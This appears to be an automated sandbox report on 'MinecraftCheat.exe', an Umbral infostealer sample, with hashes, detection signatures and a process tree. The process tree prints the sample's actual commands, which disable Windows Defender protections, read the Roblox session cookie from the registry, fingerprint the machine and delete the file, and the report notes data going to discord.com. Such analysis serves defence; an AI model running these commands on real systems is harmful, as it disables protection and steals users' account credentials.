Analysis
-
max time kernel
141s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
05-06-2024 10:51
Behavioral task
behavioral1
Sample
MinecraftCheat.exe
Resource
win7-20240508-en
General
-
Target
MinecraftCheat.exe
-
Size
231KB
-
MD5
20384d9a8661d8d1c6baeba964939ba0
-
SHA1
e44f61df3bc54d183d673235b29cf1669c978dcc
-
SHA256
8615172da6f2114f1a7b0b41050f6a3556b725d5f8aec82cc4558504137e4299
-
SHA512
4384c8c5b05ca17191c5c3636808adc84ede226dd56c15fed4127aea830d141f920079a3e3fef6bca688911ca0185336cdf327bbbed57f8f311162a83032e578
-
SSDEEP
6144:RloZM9rIkd8g+EtXHkv/iD4fNPjpaC9Hop7mGzY8vI8e1m1Ji:joZOL+EP8fNPjpaC9Hop7mGzgqQ
Malware Config
Signatures
-
Detect Umbral payload 1 IoCs
resource yara_rule behavioral2/memory/3488-1-0x000002EF11E30000-0x000002EF11E70000-memory.dmp family_umbral -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 4168 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts MinecraftCheat.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 24 discord.com 25 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 10 ip-api.com -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2000 wmic.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 3196 PING.EXE -
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 4168 powershell.exe 4168 powershell.exe 1648 powershell.exe 1648 powershell.exe 2676 powershell.exe 2676 powershell.exe 3896 powershell.exe 3896 powershell.exe 4600 powershell.exe 4600 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3488 MinecraftCheat.exe Token: SeDebugPrivilege 4168 powershell.exe Token: SeDebugPrivilege 1648 powershell.exe Token: SeDebugPrivilege 2676 powershell.exe Token: SeDebugPrivilege 3896 powershell.exe Token: SeIncreaseQuotaPrivilege 2572 wmic.exe Token: SeSecurityPrivilege 2572 wmic.exe Token: SeTakeOwnershipPrivilege 2572 wmic.exe Token: SeLoadDriverPrivilege 2572 wmic.exe Token: SeSystemProfilePrivilege 2572 wmic.exe Token: SeSystemtimePrivilege 2572 wmic.exe Token: SeProfSingleProcessPrivilege 2572 wmic.exe Token: SeIncBasePriorityPrivilege 2572 wmic.exe Token: SeCreatePagefilePrivilege 2572 wmic.exe Token: SeBackupPrivilege 2572 wmic.exe Token: SeRestorePrivilege 2572 wmic.exe Token: SeShutdownPrivilege 2572 wmic.exe Token: SeDebugPrivilege 2572 wmic.exe Token: SeSystemEnvironmentPrivilege 2572 wmic.exe Token: SeRemoteShutdownPrivilege 2572 wmic.exe Token: SeUndockPrivilege 2572 wmic.exe Token: SeManageVolumePrivilege 2572 wmic.exe Token: 33 2572 wmic.exe Token: 34 2572 wmic.exe Token: 35 2572 wmic.exe Token: 36 2572 wmic.exe Token: SeIncreaseQuotaPrivilege 2572 wmic.exe Token: SeSecurityPrivilege 2572 wmic.exe Token: SeTakeOwnershipPrivilege 2572 wmic.exe Token: SeLoadDriverPrivilege 2572 wmic.exe Token: SeSystemProfilePrivilege 2572 wmic.exe Token: SeSystemtimePrivilege 2572 wmic.exe Token: SeProfSingleProcessPrivilege 2572 wmic.exe Token: SeIncBasePriorityPrivilege 2572 wmic.exe Token: SeCreatePagefilePrivilege 2572 wmic.exe Token: SeBackupPrivilege 2572 wmic.exe Token: SeRestorePrivilege 2572 wmic.exe Token: SeShutdownPrivilege 2572 wmic.exe Token: SeDebugPrivilege 2572 wmic.exe Token: SeSystemEnvironmentPrivilege 2572 wmic.exe Token: SeRemoteShutdownPrivilege 2572 wmic.exe Token: SeUndockPrivilege 2572 wmic.exe Token: SeManageVolumePrivilege 2572 wmic.exe Token: 33 2572 wmic.exe Token: 34 2572 wmic.exe Token: 35 2572 wmic.exe Token: 36 2572 wmic.exe Token: SeIncreaseQuotaPrivilege 4564 wmic.exe Token: SeSecurityPrivilege 4564 wmic.exe Token: SeTakeOwnershipPrivilege 4564 wmic.exe Token: SeLoadDriverPrivilege 4564 wmic.exe Token: SeSystemProfilePrivilege 4564 wmic.exe Token: SeSystemtimePrivilege 4564 wmic.exe Token: SeProfSingleProcessPrivilege 4564 wmic.exe Token: SeIncBasePriorityPrivilege 4564 wmic.exe Token: SeCreatePagefilePrivilege 4564 wmic.exe Token: SeBackupPrivilege 4564 wmic.exe Token: SeRestorePrivilege 4564 wmic.exe Token: SeShutdownPrivilege 4564 wmic.exe Token: SeDebugPrivilege 4564 wmic.exe Token: SeSystemEnvironmentPrivilege 4564 wmic.exe Token: SeRemoteShutdownPrivilege 4564 wmic.exe Token: SeUndockPrivilege 4564 wmic.exe Token: SeManageVolumePrivilege 4564 wmic.exe -
Suspicious use of WriteProcessMemory 24 IoCs
description pid Process procid_target PID 3488 wrote to memory of 2576 3488 MinecraftCheat.exe 91 PID 3488 wrote to memory of 2576 3488 MinecraftCheat.exe 91 PID 3488 wrote to memory of 4168 3488 MinecraftCheat.exe 93 PID 3488 wrote to memory of 4168 3488 MinecraftCheat.exe 93 PID 3488 wrote to memory of 1648 3488 MinecraftCheat.exe 95 PID 3488 wrote to memory of 1648 3488 MinecraftCheat.exe 95 PID 3488 wrote to memory of 2676 3488 MinecraftCheat.exe 97 PID 3488 wrote to memory of 2676 3488 MinecraftCheat.exe 97 PID 3488 wrote to memory of 3896 3488 MinecraftCheat.exe 99 PID 3488 wrote to memory of 3896 3488 MinecraftCheat.exe 99 PID 3488 wrote to memory of 2572 3488 MinecraftCheat.exe 101 PID 3488 wrote to memory of 2572 3488 MinecraftCheat.exe 101 PID 3488 wrote to memory of 4564 3488 MinecraftCheat.exe 104 PID 3488 wrote to memory of 4564 3488 MinecraftCheat.exe 104 PID 3488 wrote to memory of 4056 3488 MinecraftCheat.exe 106 PID 3488 wrote to memory of 4056 3488 MinecraftCheat.exe 106 PID 3488 wrote to memory of 4600 3488 MinecraftCheat.exe 108 PID 3488 wrote to memory of 4600 3488 MinecraftCheat.exe 108 PID 3488 wrote to memory of 2000 3488 MinecraftCheat.exe 110 PID 3488 wrote to memory of 2000 3488 MinecraftCheat.exe 110 PID 3488 wrote to memory of 3528 3488 MinecraftCheat.exe 114 PID 3488 wrote to memory of 3528 3488 MinecraftCheat.exe 114 PID 3528 wrote to memory of 3196 3528 cmd.exe 116 PID 3528 wrote to memory of 3196 3528 cmd.exe 116 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 2576 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\MinecraftCheat.exe"C:\Users\Admin\AppData\Local\Temp\MinecraftCheat.exe"1⤵
- Drops file in Drivers directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3488 -
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\MinecraftCheat.exe"2⤵
- Views/modifies file attributes
PID:2576
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\MinecraftCheat.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4168
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 22⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1648
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2676
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3896
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2572
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4564
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵PID:4056
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4600
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name2⤵
- Detects videocard installed
PID:2000
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\MinecraftCheat.exe" && pause2⤵
- Suspicious use of WriteProcessMemory
PID:3528 -
C:\Windows\system32\PING.EXEping localhost3⤵
- Runs ping.exe
PID:3196
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4148 --field-trial-handle=2180,i,12780723798465539942,12010519452607841069,262144 --variations-seed-version /prefetch:81⤵PID:4172
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD562623d22bd9e037191765d5083ce16a3
SHA14a07da6872672f715a4780513d95ed8ddeefd259
SHA25695d79fd575bbd21540e378fcbc1cd00d16f51af62ce15bae7080bb72c24e2010
SHA5129a448b7a0d867466c2ea04ab84d2a9485d5fd20ab53b2b854f491831ee3f1d781b94d2635f7b0b35cb9f2d373cd52c67570879a56a42ed66bc9db06962ed4992
-
Filesize
948B
MD590c8020d02ac4b157ec228af068b9b3c
SHA1f445e6cd6ba0aa9cd74c475a36101398e2096ba9
SHA256f395f437592cbe83eae9afbfd6c12075cd9137c659fa876f587953a55f88c00d
SHA512282cb07e02cee820046960e06e49e99af7399bd89506c4b6355edce39ba44e72eb553b4ad96a1f544ac70345c9e1800df9a517a6551ba36cf6801b26a4e33914
-
Filesize
1KB
MD5227556da5e65f6819f477756808c17e4
SHA16ffce766e881ca2a60180bb25f4981b183f78279
SHA256101f5fe8a4192f14e9f0a12c105ca81c9f176860930af44747185dd1bedb59a4
SHA512d46b935809d2c4b7a041ad790f2db11c0a808df022c91ae9152b8769021b884fde49653a7a46557ef9ee65e274fe0b6c8503df9b50e6b3b849fefacf51f8bd6a
-
Filesize
1KB
MD5d335b933fd5902cc5d6e6f5cfae33b57
SHA130511e75e9f4d4b09ddbeb2b6adeb5cd89defd87
SHA256c1e38b772837438d10218009be55d7b2098daa5ba708708836f56a7e99024dc1
SHA5124839b6be9877bb1a64d387df0f93b40859e48a5b6e7d2fb5fd92a057b1973916b93727b4dca9f1819038da65fd4548afb7f0c414a82e388e714dde6e6ccb4266
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82